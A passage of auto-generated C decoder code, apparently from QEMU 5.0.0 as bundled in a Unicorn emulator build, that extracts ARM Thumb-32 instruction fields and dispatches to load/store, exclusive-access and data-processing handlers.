4)); } static void disas_t32_extract_disas_t32_Fmt_34(DisasContext *ctx, arg_ci *a, uint32_t insn) { a->cond = extract32(insn, 22, 4); a->imm = times_2(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 0, 11), 11, 21, extract32(insn, 16, 6)), 17, 15, extract32(insn, 13, 1)), 18, 14, extract32(insn, 11, 1)), 19, 13, sextract32(insn, 26, 1))); } static void disas_t32_extract_disas_t32_Fmt_4(DisasContext *ctx, arg_s_rrr_shr *a, uint32_t insn) { a->shty = extract32(insn, 21, 2); a->s = extract32(insn, 20, 1); a->rm = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->rs = extract32(insn, 0, 4); a->rn = 0; } static void disas_t32_extract_disas_t32_Fmt_48(DisasContext *ctx, arg_disas_t3230 *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->A = extract32(insn, 7, 1); a->T = extract32(insn, 6, 1); } static void disas_t32_extract_disas_t32_Fmt_9(DisasContext *ctx, arg_ri *a, uint32_t insn) { a->rd = extract32(insn, 8, 4); a->imm = deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1)); } static void disas_t32_extract_ldrex_0(DisasContext *ctx, arg_ldrex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = 15; a->imm = 0; } static void disas_t32_extract_ldrex_d(DisasContext *ctx, arg_ldrex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = extract32(insn, 8, 4); a->imm = 0; } static void disas_t32_extract_ldrex_i(DisasContext *ctx, arg_ldrex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = 15; a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t32_extract_ldst_ri_idx(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->p = extract32(insn, 10, 1); a->u = extract32(insn, 9, 1); a->imm = extract32(insn, 0, 8); a->w = 1; } static void disas_t32_extract_ldst_ri_lit(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 12); a->p = 1; a->w = 0; a->rn = 15; } static void disas_t32_extract_ldst_ri_neg(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 8); a->p = 1; a->w = 0; a->u = 0; } static void disas_t32_extract_ldst_ri_pos(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 12); a->p = 1; a->w = 0; a->u = 1; } static void disas_t32_extract_ldst_ri_unp(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 8); a->p = 1; a->w = 0; a->u = 1; } static void disas_t32_extract_ldst_rr(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->shimm = extract32(insn, 4, 2); a->rm = extract32(insn, 0, 4); a->p = 1; a->w = 0; a->u = 1; a->shtype = 0; } static void disas_t32_extract_ldstd_ri8(DisasContext *ctx, arg_ldst_ri2 *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = extract32(insn, 8, 4); a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t32_extract_ldstm(DisasContext *ctx, arg_ldst_block *a, uint32_t insn) { a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->list = 
extract32(insn, 0, 16); a->u = 0; } static void disas_t32_extract_mov16(DisasContext *ctx, arg_ri *a, uint32_t insn) { a->rd = extract32(insn, 8, 4); a->imm = deposit32(deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1)), 12, 20, extract32(insn, 16, 4)); } static void disas_t32_extract_rdm(DisasContext *ctx, arg_rr *a, uint32_t insn) { a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); } static void disas_t32_extract_rfe(DisasContext *ctx, arg_rfe *a, uint32_t insn) { a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); } static void disas_t32_extract_rn0dm(DisasContext *ctx, arg_rrrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); a->ra = 0; } static void disas_t32_extract_rnadm(DisasContext *ctx, arg_rrrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->ra = extract32(insn, 12, 4); a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); } static void disas_t32_extract_rndm(DisasContext *ctx, arg_rrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); } static void disas_t32_extract_rrr_rot(DisasContext *ctx, arg_rrr_rot *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->rot = extract32(insn, 4, 2); a->rm = extract32(insn, 0, 4); } static void disas_t32_extract_s0_rn0dm(DisasContext *ctx, arg_s_rrrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); a->ra = 0; a->s = 0; } static void disas_t32_extract_s0_rnadm(DisasContext *ctx, arg_s_rrrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->ra = extract32(insn, 12, 4); a->rd = extract32(insn, 8, 4); a->rm = extract32(insn, 0, 4); a->s = 0; } static void disas_t32_extract_s0_rri_12(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->imm = deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1)); a->rot = 0; a->s = 0; } static void disas_t32_extract_s_rri_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->imm = t32_expandimm_imm(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); a->rot = t32_expandimm_rot(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); } static void disas_t32_extract_s_rrr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->shty = extract32(insn, 4, 2); a->rm = extract32(insn, 0, 4); a->shim = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); } static void disas_t32_extract_s_rxi_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 8, 4); a->imm = t32_expandimm_imm(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); a->rot = t32_expandimm_rot(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); a->rn = 0; } static void disas_t32_extract_s_rxr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 8, 4); a->shty 
= extract32(insn, 4, 2); a->rm = extract32(insn, 0, 4); a->shim = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); a->rn = 0; } static void disas_t32_extract_sat(DisasContext *ctx, arg_sat *a, uint32_t insn) { a->sh = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->satimm = extract32(insn, 0, 5); a->imm = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); } static void disas_t32_extract_sat16(DisasContext *ctx, arg_sat *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->satimm = extract32(insn, 0, 5); a->sh = 0; a->imm = 0; } static void disas_t32_extract_srs(DisasContext *ctx, arg_srs *a, uint32_t insn) { a->w = extract32(insn, 21, 1); a->mode = extract32(insn, 0, 5); } static void disas_t32_extract_strex_0(DisasContext *ctx, arg_strex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rd = extract32(insn, 0, 4); a->rt2 = 15; a->imm = 0; } static void disas_t32_extract_strex_d(DisasContext *ctx, arg_strex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = extract32(insn, 8, 4); a->rd = extract32(insn, 0, 4); a->imm = 0; } static void disas_t32_extract_strex_i(DisasContext *ctx, arg_strex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rd = extract32(insn, 8, 4); a->rt2 = 15; a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t32_extract_tbranch(DisasContext *ctx, arg_tbranch *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rm = extract32(insn, 0, 4); } static bool disas_t32(DisasContext *ctx, uint32_t insn) { union { arg_bfi f_bfi; arg_bfx f_bfx; arg_ci f_ci; arg_cps f_cps; arg_disas_t3227 f_disas_t3227; arg_disas_t3228 f_disas_t3228; arg_disas_t3230 f_disas_t3230; arg_empty f_empty; arg_i f_i; arg_ldrex f_ldrex; arg_ldst_block f_ldst_block; arg_ldst_ri f_ldst_ri; arg_ldst_ri2 f_ldst_ri2; arg_ldst_rr f_ldst_rr; arg_mrs_bank f_mrs_bank; arg_mrs_reg f_mrs_reg; arg_msr_bank f_msr_bank; arg_msr_reg f_msr_reg; arg_pkh f_pkh; arg_r f_r; arg_rfe f_rfe; arg_ri f_ri; arg_rr f_rr; arg_rrr f_rrr; arg_rrr_rot f_rrr_rot; arg_rrrr f_rrrr; arg_s_rri_rot f_s_rri_rot; arg_s_rrr_shi f_s_rrr_shi; arg_s_rrr_shr f_s_rrr_shr; arg_s_rrrr f_s_rrrr; arg_sat f_sat; arg_srs f_srs; arg_strex f_strex; arg_tbranch f_tbranch; } u; switch ((insn >> 27) & 0x1f) { case 0x1d: /* 11101... ........ ........ ........ */ switch (insn & 0x07400000) { case 0x00000000: /* 11101000 .0...... ........ ........ */ switch (insn & 0x00900000) { case 0x00000000: /* 11101000 00.0.... ........ ........ */ disas_t32_extract_srs(ctx, &u.f_srs, insn); switch ((insn >> 5) & 0x7fff) { case 0x6e00: /* 11101000 00.01101 11000000 000..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:621 */ u.f_srs.pu = 2; if (trans_SRS(ctx, &u.f_srs)) return true; return false; } return false; case 0x00100000: /* 11101000 00.1.... ........ ........ */ disas_t32_extract_rfe(ctx, &u.f_rfe, insn); switch (insn & 0x0000ffff) { case 0x0000c000: /* 11101000 00.1.... 11000000 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:615 */ u.f_rfe.pu = 2; if (trans_RFE(ctx, &u.f_rfe)) return true; return false; } return false; case 0x00800000: /* 11101000 10.0.... ........ ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:607 */ disas_t32_extract_ldstm(ctx, &u.f_ldst_block, insn); u.f_ldst_block.i = 1; u.f_ldst_block.b = 0; if (trans_STM_t32(ctx, &u.f_ldst_block)) return true; return false; case 0x00900000: /* 11101000 10.1.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:609 */ disas_t32_extract_ldstm(ctx, &u.f_ldst_block, insn); u.f_ldst_block.i = 1; u.f_ldst_block.b = 0; if (trans_LDM_t32(ctx, &u.f_ldst_block)) return true; return false; } return false; case 0x00400000: /* 11101000 .1...... ........ ........ */ switch ((insn >> 20) & 0x3) { case 0x0: /* 11101000 .100.... ........ ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* 11101000 0100.... ........ ........ */ if ((insn & 0x0000f03f) == 0x0000f000) { /* 11101000 0100.... 1111.... ..000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:512 */ disas_t32_extract_disas_t32_Fmt_48(ctx, &u.f_disas_t3230, insn); if (trans_TT(ctx, &u.f_disas_t3230)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:513 */ disas_t32_extract_strex_i(ctx, &u.f_strex, insn); if (trans_STREX(ctx, &u.f_strex)) return true; return false; case 0x1: /* 11101000 1100.... ........ ........ */ switch ((insn >> 4) & 0xf) { case 0x4: /* 11101000 1100.... ........ 0100.... */ disas_t32_extract_strex_0(ctx, &u.f_strex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 1100.... ....1111 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:515 */ if (trans_STREXB(ctx, &u.f_strex)) return true; return false; } return false; case 0x5: /* 11101000 1100.... ........ 0101.... */ disas_t32_extract_strex_0(ctx, &u.f_strex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 1100.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:516 */ if (trans_STREXH(ctx, &u.f_strex)) return true; return false; } return false; case 0x7: /* 11101000 1100.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:517 */ disas_t32_extract_strex_d(ctx, &u.f_strex, insn); if (trans_STREXD_t32(ctx, &u.f_strex)) return true; return false; case 0x8: /* 11101000 1100.... ........ 1000.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1100.... ....1111 10001111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:525 */ if (trans_STLB(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x9: /* 11101000 1100.... ........ 1001.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1100.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:526 */ if (trans_STLH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xa: /* 11101000 1100.... ........ 1010.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1100.... ....1111 10101111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:524 */ if (trans_STL(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xc: /* 11101000 1100.... ........ 1100.... 
*/ disas_t32_extract_strex_0(ctx, &u.f_strex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 1100.... ....1111 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:520 */ if (trans_STLEXB(ctx, &u.f_strex)) return true; return false; } return false; case 0xd: /* 11101000 1100.... ........ 1101.... */ disas_t32_extract_strex_0(ctx, &u.f_strex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 1100.... ....1111 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:521 */ if (trans_STLEXH(ctx, &u.f_strex)) return true; return false; } return false; case 0xe: /* 11101000 1100.... ........ 1110.... */ disas_t32_extract_strex_0(ctx, &u.f_strex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 1100.... ....1111 1110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:519 */ if (trans_STLEX(ctx, &u.f_strex)) return true; return false; } return false; case 0xf: /* 11101000 1100.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:522 */ disas_t32_extract_strex_d(ctx, &u.f_strex, insn); if (trans_STLEXD_t32(ctx, &u.f_strex)) return true; return false; } return false; } return false; case 0x1: /* 11101000 .101.... ........ ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* 11101000 0101.... ........ ........ */ disas_t32_extract_ldrex_i(ctx, &u.f_ldrex, insn); switch ((insn >> 8) & 0xf) { case 0xf: /* 11101000 0101.... ....1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:528 */ if (trans_LDREX(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x1: /* 11101000 1101.... ........ ........ */ switch ((insn >> 4) & 0xf) { case 0x0: /* 11101000 1101.... ........ 0000.... */ disas_t32_extract_tbranch(ctx, &u.f_tbranch, insn); switch ((insn >> 8) & 0xff) { case 0xf0: /* 11101000 1101.... 11110000 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:545 */ if (trans_TBB(ctx, &u.f_tbranch)) return true; return false; } return false; case 0x1: /* 11101000 1101.... ........ 0001.... */ disas_t32_extract_tbranch(ctx, &u.f_tbranch, insn); switch ((insn >> 8) & 0xff) { case 0xf0: /* 11101000 1101.... 11110000 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:546 */ if (trans_TBH(ctx, &u.f_tbranch)) return true; return false; } return false; case 0x4: /* 11101000 1101.... ........ 0100.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 01001111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:529 */ if (trans_LDREXB(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x5: /* 11101000 1101.... ........ 0101.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 01011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:530 */ if (trans_LDREXH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x7: /* 11101000 1101.... ........ 0111.... */ disas_t32_extract_ldrex_d(ctx, &u.f_ldrex, insn); switch (insn & 0x0000000f) { case 0x0000000f: /* 11101000 1101.... ........ 
01111111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:531 */ if (trans_LDREXD_t32(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x8: /* 11101000 1101.... ........ 1000.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 10001111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:539 */ if (trans_LDAB(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x9: /* 11101000 1101.... ........ 1001.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:540 */ if (trans_LDAH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xa: /* 11101000 1101.... ........ 1010.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 10101111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:538 */ if (trans_LDA(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xc: /* 11101000 1101.... ........ 1100.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 11001111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:534 */ if (trans_LDAEXB(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xd: /* 11101000 1101.... ........ 1101.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 11011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:535 */ if (trans_LDAEXH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xe: /* 11101000 1101.... ........ 1110.... */ disas_t32_extract_ldrex_0(ctx, &u.f_ldrex, insn); switch (insn & 0x00000f0f) { case 0x00000f0f: /* 11101000 1101.... ....1111 11101111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:533 */ if (trans_LDAEX(ctx, &u.f_ldrex)) return true; return false; } return false; case 0xf: /* 11101000 1101.... ........ 1111.... */ disas_t32_extract_ldrex_d(ctx, &u.f_ldrex, insn); switch (insn & 0x0000000f) { case 0x0000000f: /* 11101000 1101.... ........ 11111111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:536 */ if (trans_LDAEXD_t32(ctx, &u.f_ldrex)) return true; return false; } return false; } return false; } return false; case 0x2: /* 11101000 .110.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:483 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 1; u.f_ldst_ri2.p = 0; if (trans_STRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; case 0x3: /* 11101000 .111.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:484 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 1; u.f_ldst_ri2.p = 0; if (trans_LDRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; } return false; case 0x01000000: /* 11101001 .0...... ........ ........ */ switch (insn & 0x00900000) { case 0x00000000: /* 11101001 00.0.... ........ ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:608 */ disas_t32_extract_ldstm(ctx, &u.f_ldst_block, insn); u.f_ldst_block.i = 0; u.f_ldst_block.b = 1; if (trans_STM_t32(ctx, &u.f_ldst_block)) return true; return false; case 0x00100000: /* 11101001 00.1.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:610 */ disas_t32_extract_ldstm(ctx, &u.f_ldst_block, insn); u.f_ldst_block.i = 0; u.f_ldst_block.b = 1; if (trans_LDM_t32(ctx, &u.f_ldst_block)) return true; return false; case 0x00800000: /* 11101001 10.0.... ........ ........ */ disas_t32_extract_srs(ctx, &u.f_srs, insn); switch ((insn >> 5) & 0x7fff) { case 0x6e00: /* 11101001 10.01101 11000000 000..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:622 */ u.f_srs.pu = 1; if (trans_SRS(ctx, &u.f_srs)) return true; return false; } return false; case 0x00900000: /* 11101001 10.1.... ........ ........ */ disas_t32_extract_rfe(ctx, &u.f_rfe, insn); switch (insn & 0x0000ffff) { case 0x0000c000: /* 11101001 10.1.... 11000000 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:616 */ u.f_rfe.pu = 1; if (trans_RFE(ctx, &u.f_rfe)) return true; return false; } return false; } return false; case 0x01400000: /* 11101001 .1...... ........ ........ */ switch ((insn >> 20) & 0x3) { case 0x0: /* 11101001 .100.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:486 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 0; u.f_ldst_ri2.p = 1; if (trans_STRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; case 0x1: /* 11101001 .101.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:487 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 0; u.f_ldst_ri2.p = 1; if (trans_LDRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; case 0x2: /* 11101001 .110.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:489 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 1; u.f_ldst_ri2.p = 1; if (trans_STRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; case 0x3: /* 11101001 .111.... ........ ........ */ if ((insn & 0x008fffff) == 0x000fe97f) { /* 11101001 01111111 11101001 01111111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:491 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_SG(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:492 */ disas_t32_extract_ldstd_ri8(ctx, &u.f_ldst_ri2, insn); u.f_ldst_ri2.w = 1; u.f_ldst_ri2.p = 1; if (trans_LDRD_ri_t32(ctx, &u.f_ldst_ri2)) return true; return false; } return false; case 0x02000000: /* 11101010 .0...... ........ ........ */ switch (insn & 0x00a08000) { case 0x00000000: /* 11101010 000..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11101010 0001.... 0...1111 ........ 
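   [annotation: generated overlap idiom: when S=1 and Rd=1111 (the
    0x00100f00 test) the insn is offered to trans_TST_xrri first; if
    that handler returns false, decoding falls through to the general
    AND form]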
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:61 */ disas_t32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_TST_xrri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:62 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_AND_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00200000: /* 11101010 001..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:64 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_BIC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00800000: /* 11101010 100..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11101010 1001.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:74 */ disas_t32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_TEQ_xrri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:75 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_EOR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x02400000: /* 11101010 .1...... ........ ........ */ switch (insn & 0x00a08000) { case 0x00000000: /* 11101010 010..... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11101010 010.1111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:66 */ disas_t32_extract_s_rxr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:67 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_ORR_rrri(ctx, 